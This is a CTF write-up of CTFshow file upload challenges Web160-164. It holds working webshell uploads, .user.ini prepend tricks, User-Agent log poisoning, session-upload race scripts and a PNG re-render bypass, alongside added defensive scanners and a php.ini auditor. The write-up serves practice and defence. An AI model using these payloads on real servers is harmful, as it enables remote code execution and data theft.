[CTFshow File Upload Web160-164] 2021.9.12 CTFshow practice

This post was last updated on: September 12, 2021 at 12:01 PM

Web160

Masters, you've got this

Open the challenge:

[screenshot: image-20210911115158452]

This challenge filters backticks and spaces, so consider log injection instead (the uploaded file includes the nginx access log, where the User-Agent is written).

First inject a one-liner into the page's User-Agent:

[screenshot: image-20210911121018991]

Then upload shell.phtml

POST /upload.php HTTP/1.1
Host: dfecea0d-b7fe-4dc0-af9c-19cea70c53c8.challenge.ctf.show:8080
Content-Length: 229
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFCBKylEYFsWAKtz0
Origin: http://dfecea0d-b7fe-4dc0-af9c-19cea70c53c8.challenge.ctf.show:8080
Referer: http://dfecea0d-b7fe-4dc0-af9c-19cea70c53c8.challenge.ctf.show:8080/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

------WebKitFormBoundaryFCBKylEYFsWAKtz0
Content-Disposition: form-data; name="file"; filename="shell.phtml"
Content-Type: image/png

<?=include"/var/lo"."g/nginx/access.lo"."g"?>
------WebKitFormBoundaryFCBKylEYFsWAKtz0--

Then upload .user.ini

POST /upload.php HTTP/1.1
Host: dfecea0d-b7fe-4dc0-af9c-19cea70c53c8.challenge.ctf.show:8080
Content-Length: 211
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFCBKylEYFsWAKtz0
Origin: http://dfecea0d-b7fe-4dc0-af9c-19cea70c53c8.challenge.ctf.show:8080
Referer: http://dfecea0d-b7fe-4dc0-af9c-19cea70c53c8.challenge.ctf.show:8080/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

------WebKitFormBoundaryFCBKylEYFsWAKtz0
Content-Disposition: form-data; name="file"; filename=".user.ini"
Content-Type: image/png

auto_prepend_file=shell.phtml
------WebKitFormBoundaryFCBKylEYFsWAKtz0--

Visit upload/index.php; the password is 1

[screenshot: image-20210911121127305]

Official hint:

Web161

Lions and tigers, go easy on me, sob sob

Open the challenge:

[screenshot: image-20210911121204947]

Compared to the previous challenge, this one also checks the file header, so a GIF89a prefix is added

First inject the one-liner webshell into the UA:

[screenshot: image-20210911121610004]

Upload shell.phtml

POST /upload.php HTTP/1.1
Host: d9316466-1fbc-46a9-8f2e-299531ae8583.challenge.ctf.show:8080
Content-Length: 238
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryaEi8DnzHuVtADSCB
Origin: http://d9316466-1fbc-46a9-8f2e-299531ae8583.challenge.ctf.show:8080
Referer: http://d9316466-1fbc-46a9-8f2e-299531ae8583.challenge.ctf.show:8080/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

------WebKitFormBoundaryaEi8DnzHuVtADSCB
Content-Disposition: form-data; name="file"; filename="shell.phtml"
Content-Type: image/png

GIF89a
<?=include"/var/lo"."g/nginx/access.lo"."g"?>
------WebKitFormBoundaryaEi8DnzHuVtADSCB--

.user.ini is set as follows:

POST /upload.php HTTP/1.1
Host: d9316466-1fbc-46a9-8f2e-299531ae8583.challenge.ctf.show:8080
Content-Length: 219
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryaEi8DnzHuVtADSCB
Origin: http://d9316466-1fbc-46a9-8f2e-299531ae8583.challenge.ctf.show:8080
Referer: http://d9316466-1fbc-46a9-8f2e-299531ae8583.challenge.ctf.show:8080/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

------WebKitFormBoundaryaEi8DnzHuVtADSCB
Content-Disposition: form-data; name="file"; filename=".user.ini"
Content-Type: image/png

GIF89a
auto_prepend_file=shell.phtml
------WebKitFormBoundaryaEi8DnzHuVtADSCB--

Visit upload/index.php; the password is 1

POSTDATA: 1=system("cat ../flag.php");

[screenshot: image-20210911121727625]
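From the defender's side, Web160 and Web161 show two things an upload handler and a log pipeline should catch: a file whose name (.phtml, .user.ini) or content (a PHP open tag after a GIF89a prefix, an auto_prepend_file directive) is executable or configuration-changing, and an access-log line whose client-controlled User-Agent carries a PHP tag, which is the log-poisoning step. The following is an added example (not code from the post or from CTFshow) that implements both checks in Python; the extension blocklist, the sample log lines and the sample uploads are constructed for this example.

```python
import re
from typing import List, Tuple

# Extensions a PHP-enabled server may hand to the interpreter (hypothetical blocklist for this
# example; the challenges above accept .phtml). A real handler should allowlist image extensions
# instead; the blocklist is here to show why a check for "php" alone misses .phtml.
PHP_EXTENSIONS = {"php", "phtml", "php3", "php4", "php5", "phps", "phar"}
# Per-directory server configuration files that change interpreter behaviour when uploaded.
CONFIG_DOTFILES = {".user.ini", ".htaccess"}
PHP_OPEN_TAG = re.compile(rb"<\?(?:php\b|=)", re.IGNORECASE)
INI_DIRECTIVE = re.compile(rb"^\s*auto_(?:prepend|append)_file\s*=", re.MULTILINE)


def check_upload(filename: str, content: bytes) -> List[str]:
    """Return reasons to reject an uploaded file; an empty list means no finding.
    The client's Content-Type header is deliberately not an input: it is attacker-chosen
    (both requests above claim image/png for a PHP file)."""
    reasons = []
    name = filename.rsplit("/", 1)[-1]
    ext = name.rsplit(".", 1)[-1].lower() if "." in name[1:] else ""
    if name in CONFIG_DOTFILES:
        reasons.append(f"{name} is a per-directory server configuration file")
    if ext in PHP_EXTENSIONS:
        reasons.append(f"extension .{ext} may be executed as PHP")
    m = PHP_OPEN_TAG.search(content)
    if m:
        # A magic-byte prefix such as GIF89a does not matter: PHP scans the whole file for tags.
        reasons.append(f"PHP open tag at byte {m.start()}")
    if INI_DIRECTIVE.search(content):
        reasons.append("auto_prepend_file/auto_append_file directive in content")
    return reasons


# nginx "combined" log format: ip ident user [time] "request" status bytes "referer" "agent".
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)


def scan_access_log(text: str) -> List[Tuple[int, str, str]]:
    """Flag log lines whose client-controlled fields carry a PHP open tag. A hit means the log
    file itself now contains executable PHP if anything ever include()s it."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        m = LOG_LINE.match(line)
        fields = m.groupdict() if m else {"raw": line}  # unparseable lines are scanned whole
        for field, value in fields.items():
            if PHP_OPEN_TAG.search(value.encode()):
                hits.append((n, field, value))
    return hits


# Constructed sample: two combined-format lines, the second with the page's one-liner as User-Agent.
SAMPLE_LOG = (
    '10.0.0.5 - - [11/Sep/2021:12:10:18 +0800] "GET /upload.php HTTP/1.1" 200 512 "-" '
    '"Mozilla/5.0 (Windows NT 6.1; Win64; x64)"\n'
    '10.0.0.5 - - [11/Sep/2021:12:10:19 +0800] "GET / HTTP/1.1" 200 512 "-" '
    '"<?=$_GET[0]($_POST[1]);?>"\n'
)

if __name__ == "__main__":
    print(scan_access_log(SAMPLE_LOG))
    print(check_upload("shell.phtml", b'GIF89a\n<?=include"/var/log/nginx/access.log"?>'))
    print(check_upload(".user.ini", b"GIF89a\nauto_prepend_file=shell.phtml"))
    print(check_upload("cat.png", b"\x89PNG\r\n\x1a\n"))
```

The log scan is the detection half: run it over the access log that the challenge's shell.phtml includes and the poisoned request from Web160/161 stands out on its own line. The upload check is the prevention half; note that it rejects the .user.ini upload even though it starts with GIF89a, because the ini parser skips lines without an equals sign.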

Official hint:

Web162

Lots of tricks, huh? Huh?

Open the challenge:

[screenshot: image-20210911181610834]

This challenge uses a race condition; related article: [File Inclusion & Race Condition] A detailed explanation of how to exploit session.upload_progress file inclusion for RCE - Lxxx (xiinnn.com)

First upload .user.ini and make it include the file png

POST /upload.php HTTP/1.1
Host: ef975a4a-4f21-4059-9f12-cd791025107d.challenge.ctf.show:8080
Content-Length: 212
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBsABHxvHz9Ppgpvz
Origin: http://ef975a4a-4f21-4059-9f12-cd791025107d.challenge.ctf.show:8080
Referer: http://ef975a4a-4f21-4059-9f12-cd791025107d.challenge.ctf.show:8080/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

------WebKitFormBoundaryBsABHxvHz9Ppgpvz
Content-Disposition: form-data; name="file"; filename=".user.ini"
Content-Type: image/png

GIF89a
auto_append_file="png"
------WebKitFormBoundaryBsABHxvHz9Ppgpvz--

Then upload the file png and make it include /tmp/sess_Lxxx

POST /upload.php HTTP/1.1
Host: ef975a4a-4f21-4059-9f12-cd791025107d.challenge.ctf.show:8080
Content-Length: 212
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBsABHxvHz9Ppgpvz
Origin: http://ef975a4a-4f21-4059-9f12-cd791025107d.challenge.ctf.show:8080
Referer: http://ef975a4a-4f21-4059-9f12-cd791025107d.challenge.ctf.show:8080/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

------WebKitFormBoundaryBsABHxvHz9Ppgpvz
Content-Disposition: form-data; name="file"; filename="png"
Content-Type: image/png

GIF89a
<?=include"/tmp/sess_Lxxx"?>
------WebKitFormBoundaryBsABHxvHz9Ppgpvz--

Then write a Python script to carry out the race condition:

import requests
import threading

url = "http://ef975a4a-4f21-4059-9f12-cd791025107d.challenge.ctf.show:8080/"
sessid = "Lxxx"


def write(session):
    # Keep sending a multipart upload with PHP_SESSION_UPLOAD_PROGRESS set, so that
    # /tmp/sess_Lxxx is repeatedly created with the payload while the upload is in flight.
    while True:
        session.post(url,
                     data={'PHP_SESSION_UPLOAD_PROGRESS': '<?php system("cat /var/www/html/f*");?>'},
                     cookies={'PHPSESSID': sessid},
                     files={'file': ('Lxxx', "Lxxx")})


def read(session):
    # Race the cleanup: upload/index.php runs png via .user.ini, which includes the session file.
    while True:
        res = session.post(url + "upload/index.php")
        if "flag" in res.text:
            print(res.text)


if __name__ == "__main__":
    with requests.session() as session:
        for i in range(5):
            threading.Thread(target=write, args=(session,)).start()
        for i in range(5):
            threading.Thread(target=read, args=(session,)).start()

This yields the flag

[screenshot: image-20210911181429478]

Official hint:

Web163

Mutual destruction

Open the challenge:

[screenshot: image-20210912112421037]

Same as web162

First upload .user.ini

POST /upload.php HTTP/1.1
Host: 5cf1e02b-1283-421f-b764-3b38954c5a4d.challenge.ctf.show:8080
Content-Length: 221
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoP7ltwfS808yQyUS
Origin: http://5cf1e02b-1283-421f-b764-3b38954c5a4d.challenge.ctf.show:8080
Referer: http://5cf1e02b-1283-421f-b764-3b38954c5a4d.challenge.ctf.show:8080/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

------WebKitFormBoundaryoP7ltwfS808yQyUS
Content-Disposition: form-data; name="file"; filename=".user.ini"
Content-Type: image/png

GIF89a
auto_append_file=/tmp/sess_Lxxx
------WebKitFormBoundaryoP7ltwfS808yQyUS--

Then run the Python script:

import requests
import threading

url = "http://5cf1e02b-1283-421f-b764-3b38954c5a4d.challenge.ctf.show:8080/"
sessid = "Lxxx"


def write(session):
    # Same race as web162; the larger file body keeps the upload (and the session file) alive longer.
    while True:
        session.post(url,
                     data={'PHP_SESSION_UPLOAD_PROGRESS': '<?php system("cat /var/www/html/flag.php");?>'},
                     cookies={'PHPSESSID': sessid},
                     files={'file': ('Lxxx', "Lxxx" * 1024)})


def read(session):
    # Here .user.ini appends /tmp/sess_Lxxx directly, so upload/index.php includes it on every request.
    while True:
        res = session.post(url + "upload/index.php")
        if "ctfshow" in res.text:
            print(res.text)


if __name__ == "__main__":
    with requests.session() as session:
        for i in range(50):
            threading.Thread(target=write, args=(session,)).start()
        for i in range(50):
            threading.Thread(target=read, args=(session,)).start()

Got the flag:

[screenshot: image-20210912112507229]
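Web160 through Web163 all rest on interpreter settings rather than on a bug in upload.php: per-directory .user.ini files are honoured (user_ini.filename), and session.upload_progress writes attacker-chosen text into sess_<PHPSESSID> while an upload is in flight. The following is an added example (not code from the post or from CTFshow) of a small php.ini/.user.ini reader plus an audit of those directives. The directive names and their PHP defaults are real; the sample ini texts are constructed, and the "hardened" values are this example's recommendations.

```python
from typing import Dict, List, Tuple

TRUE_VALUES = {"1", "on", "true", "yes"}


def parse_php_ini(text: str) -> Dict[str, str]:
    """Minimal php.ini / .user.ini reader: ';' starts a comment, '[section]' lines and lines
    without '=' are ignored, surrounding quotes are stripped. A line such as GIF89a is simply
    skipped, which is why the Web161-163 uploads could start with a GIF header and still work."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()
        if not line or line.startswith("[") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        settings[key.strip()] = value.strip().strip('"')
    return settings


def ini_bool(value: str) -> bool:
    return value.strip().lower() in TRUE_VALUES


def effective_settings(server_ini: str, user_ini: str = "") -> Dict[str, str]:
    """Overlay an uploaded .user.ini on the server php.ini, as PHP does for scripts in that
    directory. (PHP only honours PHP_INI_PERDIR directives from .user.ini; this example does
    not model that restriction.)"""
    return {**parse_php_ini(server_ini), **parse_php_ini(user_ini)}


def audit(settings: Dict[str, str]) -> List[Tuple[str, str]]:
    """Flag the effective settings that enable the techniques in Web160-163.
    Where a directive is absent, PHP's documented default is assumed."""
    findings = []
    if settings.get("user_ini.filename", ".user.ini") != "":
        findings.append(("user_ini.filename",
                         "per-directory .user.ini files are honoured, so an uploads directory under "
                         "the document root lets an uploaded .user.ini set auto_prepend_file/"
                         "auto_append_file (Web160-163); set it to an empty string or keep uploads "
                         "outside the docroot"))
    if ini_bool(settings.get("session.upload_progress.enabled", "1")):
        findings.append(("session.upload_progress.enabled",
                         "on (PHP default): a multipart upload carrying PHP_SESSION_UPLOAD_PROGRESS "
                         "writes attacker-chosen text into sess_<PHPSESSID> while the upload runs "
                         "(Web162/163); disable unless the application uses it"))
    if not ini_bool(settings.get("session.upload_progress.cleanup", "1")):
        findings.append(("session.upload_progress.cleanup",
                         "off: the progress data stays in the session file after the upload, so no "
                         "race is needed at all; keep cleanup on"))
    for directive in ("auto_prepend_file", "auto_append_file"):
        if settings.get(directive, ""):
            findings.append((directive,
                             f"set to {settings[directive]!r}: every PHP request in this directory "
                             "runs that file first/last; in an uploads directory this is the "
                             "persistence used in Web160-163"))
    return findings


# Constructed samples: a server php.ini fragment, the .user.ini body Web162 uploaded, and a
# hardened fragment.
SERVER_INI = """
[PHP]
; session settings
session.upload_progress.enabled = On
session.upload_progress.cleanup = On
user_ini.filename = ".user.ini"   ; default value
"""
UPLOADED_USER_INI = 'GIF89a\nauto_append_file="png"\n'
HARDENED_INI = """
session.upload_progress.enabled = Off
session.upload_progress.cleanup = On
user_ini.filename =
"""

if __name__ == "__main__":
    for directive, message in audit(effective_settings(SERVER_INI, UPLOADED_USER_INI)):
        print(f"{directive}: {message}")
    print(audit(effective_settings(HARDENED_INI)))
```

Running audit() on the server settings alone already reports the two enabling directives; overlaying the uploaded .user.ini adds the auto_append_file finding, which is what to look for when sweeping upload directories for dropped ini files. The hardened fragment produces no findings.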

Official hint:

Web164

A complete makeover

Open the challenge:

[screenshot: image-20210912115401877]

This challenge tests bypassing PNG second rendering (the server re-encodes the uploaded image). The payload is given directly here; a detailed explanation of the principle will follow in a separate article (a hole to fill later)

<?php
$p = array(0xa3, 0x9f, 0x67, 0xf7, 0x0e, 0x93, 0x1b, 0x23,
           0xbe, 0x2c, 0x8a, 0xd0, 0x80, 0xf9, 0xe1, 0xae,
           0x22, 0xf6, 0xd9, 0x43, 0x5d, 0xfb, 0xae, 0xcc,
           0x5a, 0x01, 0xdc, 0x5a, 0x01, 0xdc, 0xa3, 0x9f,
           0x67, 0xa5, 0xbe, 0x5f, 0x76, 0x74, 0x5a, 0x4c,
           0xa1, 0x3f, 0x7a, 0xbf, 0x30, 0x6b, 0x88, 0x2d,
           0x60, 0x65, 0x7d, 0x52, 0x9d, 0xad, 0x88, 0xa1,
           0x66, 0x44, 0x50, 0x33);

$img = imagecreatetruecolor(32, 32);

// Write the byte triples as RGB pixels along the first row of the image.
for ($y = 0; $y < sizeof($p); $y += 3) {
    $r = $p[$y];
    $g = $p[$y+1];
    $b = $p[$y+2];
    $color = imagecolorallocate($img, $r, $g, $b);
    imagesetpixel($img, round($y / 3), 0, $color);
}

imagepng($img, './1.png');
?>

Save and run it to get 1.png; upload 1.png to obtain the image link, then connect to the one-liner. The one-liner webshell content is:

<?=$_GET[0]($_POST[1]);?>

The PoC is as follows:

POST /download.php?image=4a47a0db6e60853dedfcfdf08a5ca249.png&0=system HTTP/1.1
Host: 68ed71e7-d3bc-4cd2-ab0e-9ecac9d7f57d.challenge.ctf.show:8080
Content-Length: 14
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://68ed71e7-d3bc-4cd2-ab0e-9ecac9d7f57d.challenge.ctf.show:8080
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://68ed71e7-d3bc-4cd2-ab0e-9ecac9d7f57d.challenge.ctf.show:8080/download.php?image=4a47a0db6e60853dedfcfdf08a5ca249.png&0=system
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

1=cat flag.php
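The post defers the explanation of why these pixel values survive re-rendering, but the PoC shows what the defender has to assume: download.php includes the re-encoded image, so the one-liner's bytes must be present in the file that the server itself produced, and re-rendering alone did not remove them. The following is an added example (not code from the post or from CTFshow) of a PNG chunk parser with CRC checks that scans both the raw file bytes (what PHP would parse on include) and the decoded pixel stream, and reports data after IEND. The sample images are constructed with a small encoder included here; the deflate-level trick used to build them (stored blocks keep scanline bytes verbatim in the file) is this example's own illustration, not the page's technique.

```python
import struct
import zlib
from typing import List, Tuple

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
PHP_OPEN_TAGS = (b"<?php", b"<?=")


def parse_chunks(data: bytes) -> Tuple[List[Tuple[bytes, bytes]], bytes]:
    """Split a PNG into (type, body) chunks, verifying each CRC. Returns the chunks and any
    bytes found after IEND, a common carrier for polyglot payloads."""
    if not data.startswith(PNG_SIGNATURE):
        raise ValueError("not a PNG: bad signature")
    pos = len(PNG_SIGNATURE)
    chunks = []
    while pos < len(data):
        if pos + 8 > len(data):
            raise ValueError("truncated chunk header")
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        body = data[pos + 8:pos + 8 + length]
        crc_bytes = data[pos + 8 + length:pos + 12 + length]
        if len(body) != length or len(crc_bytes) != 4:
            raise ValueError(f"truncated chunk {ctype!r}")
        if zlib.crc32(ctype + body) != struct.unpack(">I", crc_bytes)[0]:
            raise ValueError(f"bad CRC in chunk {ctype!r}")
        chunks.append((ctype, body))
        pos += 12 + length
        if ctype == b"IEND":
            break
    return chunks, data[pos:]


def scan_png(data: bytes) -> List[str]:
    """Report PHP open tags in the raw file bytes (what include() sees), in the decoded
    pixel data (a carrier that survives a decode/re-encode), and any bytes after IEND."""
    findings = []
    for tag in PHP_OPEN_TAGS:
        off = data.find(tag)
        if off != -1:
            findings.append(f"{tag.decode()} in raw file bytes at offset {off}")
    chunks, trailing = parse_chunks(data)
    pixels = zlib.decompress(b"".join(body for ctype, body in chunks if ctype == b"IDAT"))
    for tag in PHP_OPEN_TAGS:
        off = pixels.find(tag)
        if off != -1:
            findings.append(f"{tag.decode()} in decoded pixel data at offset {off}")
    if trailing:
        findings.append(f"{len(trailing)} trailing bytes after IEND")
    return findings


def build_png(width: int, height: int, rows: List[bytes], level: int = 6) -> bytes:
    """Encode 8-bit RGB rows (width*3 bytes each) as a PNG with filter type 0 on every
    scanline. Only used to construct samples; it is not the GD script from the page."""
    def chunk(ctype: bytes, body: bytes) -> bytes:
        return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", zlib.crc32(ctype + body))
    assert len(rows) == height and all(len(r) == width * 3 for r in rows)
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0)
    raw = b"".join(b"\x00" + row for row in rows)
    return PNG_SIGNATURE + chunk(b"IHDR", ihdr) + chunk(b"IDAT", zlib.compress(raw, level)) + chunk(b"IEND", b"")


# Constructed samples: a blank 32x2 image, and the same image with the page's one-liner as the
# pixel bytes of the first scanline, encoded once with deflate level 0 (stored blocks, so the
# bytes appear verbatim in the file) and once with the default level (Huffman-coded, so only
# decoding the pixels reveals them).
PAYLOAD = b"<?=$_GET[0]($_POST[1]);?>"
CLEAN_PNG = build_png(32, 2, [bytes(96), bytes(96)])
CRAFTED_STORED = build_png(32, 2, [PAYLOAD.ljust(96, b"\x00"), bytes(96)], level=0)
CRAFTED_DEFLATED = build_png(32, 2, [PAYLOAD.ljust(96, b"\x00"), bytes(96)])

if __name__ == "__main__":
    print(scan_png(CLEAN_PNG))
    print(scan_png(CRAFTED_STORED))
    print(scan_png(CRAFTED_DEFLATED))
    print(scan_png(CLEAN_PNG + b"<?php x"))
```

The two crafted samples make the practical point: a byte-level grep of the file catches the stored-block case but not the Huffman-coded one, while decoding the pixels catches both carriers, so a scanner run after re-rendering should do both. Even then, the reliable fix for Web164's pattern is the one the challenge violates: never include() a user-supplied file, whatever its extension or magic bytes.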

Official hint: